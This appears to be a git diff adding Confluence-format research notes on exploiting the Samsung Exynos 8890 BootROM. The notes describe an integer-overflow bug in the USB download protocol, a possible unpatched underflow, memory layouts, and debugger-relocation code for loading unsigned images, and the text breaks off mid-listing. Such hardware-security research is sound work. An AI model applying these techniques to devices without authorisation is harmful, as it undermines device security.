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
Mn7tKD5~jxf2a#3J_5c6?

literal 0
HcmV?d00001

diff --git a/documentation/_build/confluence/.doctrees/index.doctree b/documentation/_build/confluence/.doctrees/index.doctree
new file mode 100644
index 0000000000000000000000000000000000000000..de871f97352e0c6478603204a05d6871e04df8b7
GIT binary patch
literal 3941
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

literal 0
HcmV?d00001

diff --git a/documentation/_build/confluence/BootROM_8890/01_start.conf b/documentation/_build/confluence/BootROM_8890/01_start.conf
new file mode 100644
index 0000000..c00bc0a
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/01_start.conf
@@ -0,0 +1,18 @@
+<p>The Exynos 8890 BootROM is a small piece of code that runs on the Exynos SoC at boot runtime. It is responsible for initializing the hardware and loading the first stage bootloader from storage. The BootROM is stored in a read-only memory and cannot be modified.</p><p>Useful links:</p><ul>
+<li>
+<p><a href="https://github.com/LineageOS/android_kernel_samsung_universal8890/tree/lineage-18.1/arch/arm64/boot/dts">DTSI files for exynos8890</a></p></li>
+<li>
+<p><a href="https://github.com/frederic/exynos-usbdl/tree/master">Frederic exynos-usbdl on Github</a>’</p></li>
+<li>
+<p><a href="https://github.com/ananjaser1211/exynos8890-exynos-usbdl-recovery">Exynos8890 usbdl-recovery images/firmwares</a></p></li>
+</ul>
+<p>Be sure to use the correct firmware and firmware version for your S7 when trying this exploit/Frederic’s recovery boot (otherwise the booting will likely fail after sending BL31)!</p><h2>Protections</h2>
+<p>There are no stack canaries or guard pages, and no ASLR. Meaning there are almost no protections in place. There is however an SMC and a MMU. The SMC is used to communicate with the secure world, and the MMU is used to map the memory.</p><p>Rom is at address 0x0 and is unwritable (Sometimes this is writeable due to MMU caching) and is 0x20000 bytes long.</p><h2>Samsung Firmware</h2>
+<p>Samsung releases firmware files for their devices. These files contain the bootloader, modem, and other firmware files. To see how the ROM works we are interested in the sboot firmware, which contains multiple stages of the bootloader.</p><p>These files can then be used to boot the device into USB recovery. To extract the sboot.bin file from a samsung firmware file:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[$ unzip -p firmware.zip 'BL_*.tar.md5' | tar -Oxf - 'sboot.bin.lz4' | lz4 -d - sboot.bin]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>For additional bootloaders, see: <a href="https://github.com/ananjaser1211/exynos8890-exynos-usbdl-recovery">Github exynos8890-exynos-usbdl-recovery</a></p><h2>Memory Layout</h2>
+<p>The memory layout of the Exynos 8890 is as follows:</p><h2>Download protocol</h2>
+<p>When the ROM is unable to boot from the internal storage, it enters <code>Exynos Recovery Mode</code>.</p><p>In this mode the bootROM accepts data over USB. There is little functionality other than receiving data, meaning almost no additional attack surface except for the download protocol.</p><p>The Exynos BootROM uses a custom protocol to download a bootable image over USB. This image is verified and executed by the BootROM. Unauthorized images are rejected. Initial authorisation is done using the ‘_auth_bl1’ function. Frederic has exploited a vulnerability in the download protocol to load Unauthorized images.</p>
\ No newline at end of file
diff --git a/documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf b/documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf
new file mode 100644
index 0000000..503cbbb
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf
@@ -0,0 +1,94 @@
+<p>Frederic published a blogpost on reversing the <a href="https://fredericb.info/2020/06/reverse-engineer-usb-stack-of-exynos-bootrom.html#reverse-engineer-usb-stack-of-exynos-bootrom">USB stack of the Exynos BootROM</a> and a blogpost on exploiting the <a href="https://fredericb.info/2020/06/exynos-usbdl-unsigned-code-loader-for-exynos-bootrom.html#exynos-usbdl-unsigned-code-loader-for-exynos-bootrom">Exynos 8890 BootROM</a>. Here we will discuss the exploit in more detail.</p><p>The code can be found in the <a href="https://github.com/frederic/exynos-usbdl/tree/master">exynos-usbdl repository</a>.</p><h2>USB Stack in BootROM</h2>
+<p>The bootRom is the first code that runs on the Exynos SoC. It is responsible for initializing the hardware and loading the first stage bootloader from storage. The BootROM is stored in a read-only memory and cannot be modified (making vulnerabilities in this permanent/non-patcheable). The BootROM is responsible for initializing the USB controller and receiving the first stage bootloader from the USB host. It will be waiting for a package in the following format (dldata == download data):</p><h3>dldata</h3>
+<p>A key For uploading a stage to boot, a custom protocol is used. The dldata that has to be send is 512 bytes long, and has the following format:</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">The dldata packet is used to send data to the BootROM.</p>
+</p>
+<p>The size in the packet is the total size of the packet, including header and footer. If we modify this, we will have a payload size of around 502 bytes.</p><ac:structured-macro ac:name="note">
+<ac:rich-text-body><p>This protocol remains <em>mostly</em> the same for newer Exynos SoCs.</p></ac:rich-text-body>
+</ac:structured-macro>
+<h3>USB Controller / DWC3</h3>
+<p>The Exynos 8890 uses the Synopsys DesignWare USB 3.0 controller. Much of the code is shared with the DWC3 driver in the Linux kernel, except that the ROM does not do any scheduling and a lot of features have been removed(OTG handling, etc).</p><p>The base address of the usb controller (dwusb3) is mapped at 0x1540000, with a size of 0x10000: (can be found at: <a href="https://github.com/LineageOS/android_kernel_samsung_universal8890/tree/lineage-18.1/arch/arm64/boot/dts">Exynos8890 dtsi</a>).</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">none</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[udc: usb@15400000 {
+        compatible = "samsung,exynos8890-dwusb3";
+        clocks = <&clock 700>, <&clock 703>, <&clock 708>, <&clock 709>;
+        clock-names = "aclk", "sclk", "phyclock", "pipe_pclk";
+        reg = <0x0 0x15400000 0x10000>;
+        #address-cells = <2>;
+        #size-cells = <1>;
+        ranges;
+        usb-pm-qos-int = <255000>;
+        status = "disabled";
+
+        usbdrd_dwc3: dwc3 {
+                compatible = "synopsys,dwc3";
+                reg = <0x0 0x15400000 0x10000>;
+                interrupts = <0 213 0>;
+                phys = <&usbdrd_phy0 0>, <&usbdrd_phy0 1>;
+                phy-names = "usb2-phy", "usb3-phy";
+        };
+};c]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>This is a basic USB controller, but some functions, that are also present in the linux kernel, should be visible in the bootROM as well. Available functions could be: <a href="https://android.googlesource.com/kernel/msm/+/android-msm-dory-3.10-kitkat-wear/drivers/usb/dwc3/core.h">linux-kernel-dwc3</a>.</p><p>The USB host sends a USB_REQ_SET_ADDRESS, <a href="https://asf.microchip.com/docs/latest/common.services.usb.class.composite.device.example.hidms_msc.saml21_xplained_pro/html/group__usb__protocol__group.html">‘0x05’</a>, which the connected device has to acknowledge, and will then start sending data to this address. Initially, the device will send data to ‘0x00’.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">cpp</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[usb_reqid {
+        USB_REQ_GET_STATUS = 0,
+        USB_REQ_CLEAR_FEATURE = 1,
+        USB_REQ_SET_FEATURE = 3,
+        USB_REQ_SET_ADDRESS = 5,
+        USB_REQ_GET_DESCRIPTOR = 6,
+        USB_REQ_SET_DESCRIPTOR = 7,
+        USB_REQ_GET_CONFIGURATION = 8,
+        USB_REQ_SET_CONFIGURATION = 9,
+        USB_REQ_GET_INTERFACE = 10,
+        USB_REQ_SET_INTERFACE = 11,
+        USB_REQ_SYNCH_FRAME = 12
+        }]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>Ghidra shows <em>DWC3_DCFG &amp; 0xfffffc00 | DWC3_DCFG &amp; 7 | (param_1 &amp; 0x7f) &lt;&lt; 3;</em>, essentially preserves bits 0-2 and 10-31, and sets bits 3-9 to the value of param_1, which is then likely the address of the device.</p><p><p style="clear: both;text-align: center;">bootrom exynos 8890 dwc3_dcfg_devaddr</p>
+</p>
+<p>Other general device descriptors are also sent from the device to the host (to describe the device), these are visible in/at ‘usb_init_device_descriptor’ (6098) and usb_init_descriptors (610c). Two end point addresses are visible: bEndpointAddress 0x81 and 0x02. 0x81 is 10000001 in binary, with bit 7 being ‘1’, which means that the bulk transfer direction is IN. 0x02 is 00000010 in binary, with bit ‘7’ being ‘0’, which means that the bulk transfer direction is OUT.</p><p>Data is transferred via Transfer Request Blocks (TRB), dwc3_depcmd_starttransfer is used. The TRB then contains a buffer address, where transferred data from the host is written to. The buffer allocation is done by ‘usb_setup_event_buffer’, which sets bufferHigh (DWC3_GEVNTADRLO), bufferLow (DWC3_GEVNTADRHI) and bufferSize (DWC3_GEVNTSIZ).</p><h4>Bug 1 (Integer overflow)</h4>
+<p>Originally described in this <a href="https://fredericb.info/2020/06/exynos-usbdl-unsigned-code-loader-for-exynos-bootrom.html#exynos-usbdl-unsigned-code-loader-for-exynos-bootrom">blogpost</a>. Our if-statement is written a bit different, but boils down to the same thing.</p><p>The exynos bootrom uses a simple USB protocol to receive a bootloader binary from a USB host. The binary sent is called ‘dldata’. In Ghidra, at 21518, we can see that it consists of unit32_t: ready?, uint32: size, ? : data, uint16: footer. The contents of this data are checked before being being written.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="usb_setup_ready_to_0.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">The ready flag is set to 0 in the Exynos 8890 BootROM in an earlier function on pdVar1-&gt;size (pdVar1.size)</p>
+</p>
+<p><ac:image ac:align="center">
+<ri:attachment ri:filename="dl_data_struct.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">The dldata struct in the Exynos 8890 BootROM</p>
+</p>
+<ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">cpp</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[    if ((pdVar1->size < 0x206ffff) && (0x206ffff < pdVar1->size + remaining)) {
+  *(undefined *)&pdVar1->ready = 2;
+}]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>In essence, the payload is not allowed to be larger than 0x206fff (34013183), it checks so with 2 seperate checks 1) In the first condition, the size has to be smaller than 0x206ffff (<em>pdVar1-&gt;size &lt; 0x206ffff</em>) (34013183 in decimal), 2) and in the second condition, it checks whether 0x206ffff is indeed still less than the size of the payload + remaining (size + remaining)(<em>0x206ffff &lt; pdVar1-&gt;size + remaining</em>).</p><p>If both conditions are met, the payload will NOT be loaded. But this makes sense, as both checks just ensure that the payload is not larger than 0x206ffff.</p><p>The bug is however, that the check that the check is done on a uint32_t (2^32 = 4294967296), but the max value that can be checked by a uint32 is 0xFDFDE7FF = 4294967295. So a value of 0xFDFDE7FF + 1 = 0xFDFDE800 = 4294967296, which is larger than the max value of a uint32. So if a payload of this size or more is used, which is much larger than the max requested value 0x206ffff, the check will pass and the payload will still be loaded.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="usb_payload_size_check.jpeg"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">The size check in the Exynos 8890 BootROM</p>
+</p>
+<p>Sending such large amounts of data can cause a memory overflow, and will cause the target to crash. Not interesting for exploitation in this context. However, the USB packages that are sent, are split into smaller packages with a size of 0xFFFE00.</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="max_allowed_chunck_size.jpeg"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">The max allowed chunk size, after which the payload is split.</p>
+</p>
+<p>The dl_buf pointer is set to the amount it expects to write, instead to the amount that it has written. By transferring a large amount of data, without actually writing it (so in a package, send no data, but tell the target that you’re sending data with a length larger than 0xFDFDE800), will cause the pointer to move, without actually writing data.</p><p>The trick then becomes, to get the pointer to an address we would like to exploit unto. Then we have a little less than 512 bytes (502 according to dldata) to write our payload.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">cpp</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[typedef struct dldata_s {
+        u_int32_t ready; //start = 02021518, end = 0202151C. Length = 4
+        u_int32_t size; //start = 0202151C, end = 02021520. Length = 4
+        u_int8_t  data[n]; //start = 02021520, end = 02021714. Length = 502 == MAX TRANSFER SIZE
+        u_int16_t footer; //start = 02021714, end = 02021716. Length = 2
+} dldata;]]></ac:plain-text-body>
+</ac:structured-macro>
+<h4>Bug 2</h4>
+<ac:structured-macro ac:name="note">
+<ac:rich-text-body><p>Might be a 0/N-day if exploitable</p></ac:rich-text-body>
+</ac:structured-macro>
+<p>There is a bug(unpatched?) in receiving the last packet of the usb image:</p><p><ac:image ac:align="center">
+<ri:attachment ri:filename="underflow_bug.png"></ri:attachment>
+</ac:image><p style="clear: both;text-align: center;">The bug is an integer underflow in the calculation of the remaining size of the image.</p>
+</p>
diff --git a/documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf b/documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf
new file mode 100644
index 0000000..9878293
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf
@@ -0,0 +1,281 @@
+<p>This part describes the boot chain of the <code>Exynos 8890</code> SoC.</p><ac:structured-macro ac:name="warning">
+<ac:rich-text-body><p>This is all still under development and will change.</p></ac:rich-text-body>
+</ac:structured-macro>
+<h2>General overview</h2>
+<h3>Memory layout</h3>
+<p>Keep this overview in mind when reading through the boot chain exploit.</p><h3>Approach</h3>
+<p>In our initial approach, we were manually booting all stages from the debugger, and jumping directly back to the debugger (without using the USB protocol). This was done to keep the debugger alive throughout the boot chain, but this became very difficult after BL31, as the MMU didn’t allow us to read/write to most spaces, cutting off our access to BL31 during boot at some point. And losing our debugger interface in the process.</p><p>This is also why there is some ghost code within the project. We were trying to keep the debugger alive throughout the boot chain, but this was not easily feasible.</p><h3>Boot stages</h3>
+<p>Get the correct payloads for the bootROM stages from samsung firmware files, or from <a href="https://github.com/ananjaser1211/exynos8890-exynos-usbdl-recovery">Exynos8890 usbdl-recovery images/firmwares</a>.</p><p><strong>bootrom stages</strong>
+</p>
+<table>
+<thead>
+<tr>
+<th><p>File</p></th>
+<th><p>Strings output</p></th>
+<th><p>Likely boot stage?</p></th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<td><p>sboot.bin.1.bin</p></td>
+<td><p>Exynos BL1</p></td>
+<td><p>BL1</p></td>
+</tr>
+<tr>
+<td><p>sboot.bin.2.bin</p></td>
+<td><p>BL31 %s</p></td>
+<td><p>BL31</p></td>
+</tr>
+<tr>
+<td><p>sboot.bin.3.bin</p></td>
+<td><p>Unsure. Contains strings like: TOP_DIV_ACLK_MFC_600 and APOLLO_DIV_APOLLO_RUN_MONITOR</p></td>
+<td><p>BL2?</p></td>
+</tr>
+<tr>
+<td><p>sboot.bin.4.bin</p></td>
+<td><p>Contains more textual information, and references to post BL2 boot, and android information</p></td>
+<td><p>Kernel boot/BL33?</p></td>
+</tr>
+</tbody>
+</table>
+<h3>Gupje</h3>
+<ac:structured-macro ac:name="info">
+<ac:rich-text-body><p><a href="https://git.herreweb.nl/EljakimHerrewijnen/Samsung_S7">Gupje</a> is the debugger we’ll be loading onto the device and will be moving around throughout the bootchain.</p></ac:rich-text-body>
+</ac:structured-macro>
+<p>Gupje needs to be built and loaded onto the device. Throughout the exploit, we’ve been moving the debugger to different spaces in memory on the device. This was necessary as the space we initially used, was in the way of the space used for BL31 or BL2. After BL31, we lost access to the debugger, as BL2 was overwriting our last available space. At some point we moved the debugger to 0x11200000, as we saw that this space was used by BL31. Here below the most important arguments to build the debugger. This space is executable when the MMU is off.</p><p>Here the <code>linksript.txt</code> file.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[LINKSCRIPT.txt
+
+debugger_storage = 0x11201200;
+debugger_stack = 0x11201000;
+debugger_entry = 0x11200000;
+
+maybe_usb_setup_read = 0x00006f88;
+dwc3_ep0_start_trans = 0x0000791c;
+usb_event_handler = 0x00007bac;
+get_endpoint_recv_buffer = 0x00007a7c;
+exynos_sleep = 0x000027c8;
+
+g_recv_buffer = 0x11201600;
+g_data_received = 0x11201400;]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>And the <code>symbols.ld</code> file.</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[SYMBOLS.ld
+
+MEMORY {
+    ROM (rwx): ORIGIN = 0x11200000, LENGTH = 0x1000
+}
+
+SECTIONS
+{
+    . = 0x11200000;
+    .text . : {
+        *(.text*)
+        *(.data*)
+        *(.rodata*)
+    } >ROM
+
+}]]></ac:plain-text-body>
+</ac:structured-macro>
+<h2>Debuggers</h2>
+<p>After initial exploitation the goal was to fully boot the device. We’re now moving into the next phase: 1) loading a debugger 2) and then to continue booting the device. If we manage to keep access to the debugger throughout the boot, this gives us room to exploit the device. But, the debugger needs to be kept ‘alive’ through the boot chain. The main difficulties here are the location of the debugger in memory (as it gets overwritten) and the MMU being enabled after BL31.</p><h3>Initial debugger</h3>
+<p>The initial debugger is written to <code>0x2069000</code>, with debugger_stack and _storage at <code>0x0206b000</code> and <code>0x0206d000</code> respectively.</p><p>After the initial loading of the debugger, the processor state reported is (using ghidra assistant):</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[root | DEBUG |
+            X0 : 0x0 | X1 : 0xffffffff | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
+            X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
+            X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 |
+            X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
+            X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20219b8 | SP/X31 : 0x2020ef0]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>LR/X30 being the line register. This is the address the processor will jump to when the function is done (important to keep track off).</p><h3>Second debugger</h3>
+<p>After a cache flush, the debugger seems to be cleared as well, so the debugger is relocated to <code>0x20c0000</code>, with _stack and _storage now at <code>0x20c2000</code> and <code>0x20c4000</code> respectively. This is done by running:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">python</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[self.cd.arch_dbg.state.auto_sync = False
+self.cd.arch_dbg.state.auto_sync_special = False
+self.cd.arch_dbg.state.print_ctx()
+
+def relocate_debugger():
+    # Seems to be cleared upon cache clearing??
+    debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
+    self.cd.memwrite_region(0x020c0000, debugger_reloc)
+    self.usb_write(b"FLSH") # Flush cache
+    self.cd.restore_stack_and_jump(0x020c0000)
+    assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
+    self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
+relocate_debugger()]]></ac:plain-text-body>
+</ac:structured-macro>
+<p>The processor state reported then is:</p><ac:structured-macro ac:name="code">
+<ac:parameter ac:name="language">bash</ac:parameter>
+<ac:parameter ac:name="linenumbers">false</ac:parameter>
+<ac:plain-text-body><![CDATA[root | DEBUG |
+          X0 : 0x0 | X1 : 0x1 | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
+          X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
